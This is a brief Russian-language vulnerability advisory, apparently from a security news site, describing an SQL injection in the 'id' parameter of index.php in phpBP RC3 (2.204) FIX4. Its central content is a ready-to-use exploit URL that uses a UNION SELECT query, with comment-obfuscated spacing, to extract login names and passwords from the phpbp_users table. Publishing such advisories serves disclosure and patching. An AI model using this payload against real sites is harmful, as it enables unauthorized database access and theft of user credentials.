Программа: phpBP RC3 (2.204) FIX4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[host]/[path]/index.php?function=banner_out&id=10000/* */LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F, login,0x5F,pass),4,5,6,7,8,9/**/FROM/* */phpbp_users/**/LIMIT/**/1/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии